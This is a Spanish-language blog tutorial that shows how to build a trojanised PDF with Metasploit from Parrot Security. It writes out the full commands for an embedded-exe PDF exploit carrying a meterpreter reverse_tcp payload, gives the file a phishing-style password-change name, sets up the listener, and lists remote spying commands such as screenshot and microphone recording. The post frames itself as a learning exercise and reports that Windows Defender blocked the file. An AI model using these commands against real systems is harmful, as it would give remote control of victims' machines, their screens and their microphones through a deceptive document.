Crear un archivo PDF malicioso con Parrot Security

por | septiembre 20, 2017

Hola comunidad, les dejo este articulo donde se detalla la forma de crear un archivo en formato PDF. El archivo contiene código malicioso (troyano) y cuyo objetivo es comprobar la eficacia del mismo.

Escenario

  • El sistema victima es Windows 8 y 10 de 64 bits.

  • El sistema atacante es Parrot Security.

  • Red LAN es 192.168.1.0/24

Para iniciar se ejecuta el siguiente comando desde la consola del atacante

sudo msfconsole

Se ingresan las siguientes sintaxis para la ubicación y uso del payload (código malicioso)

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp

Se asigna el nombre deseado al archivo PDF

set filename aviso_cambio_contraseña.pdf

Se define la dirección IP y puerto del atacante

set lhost 192.168.1.4
set lport 4444

Se ejecuta el siguiente comando para que se cree en archivo en la ruta /root/.msf4/local

exploit

Se exporta el archivo a un Sistema Windows y se ejecuta, sino es detectado por el antivirus (debería de hacerlo) se prosigue con los siguientes comandos

back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.4
set lport 4444
exploit

Terminada la ejecución del expolit se puede hacer uso del comando help para conocer los comandos que se pueden ejecutar de forma remota, por ejemplo

  • sysinfo para detallar información del sistema.
  • screenshot para obtener captura de pantalla.
  • record_mic para grabar con el micrófono.

Conclusión

  • La prueba fue satisfactoria logrando el acceso cuando el sistema victima estaba expuesta sin protección (antivirus desactivado).
  • Por su contra parte la prueba no fue satisfactoria al contar con el sistema de protección activado que viene por defecto (Defender).

Este articulo se creo con fines de aprendizaje.

Saludos.

Print Friendly, PDF & Email

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *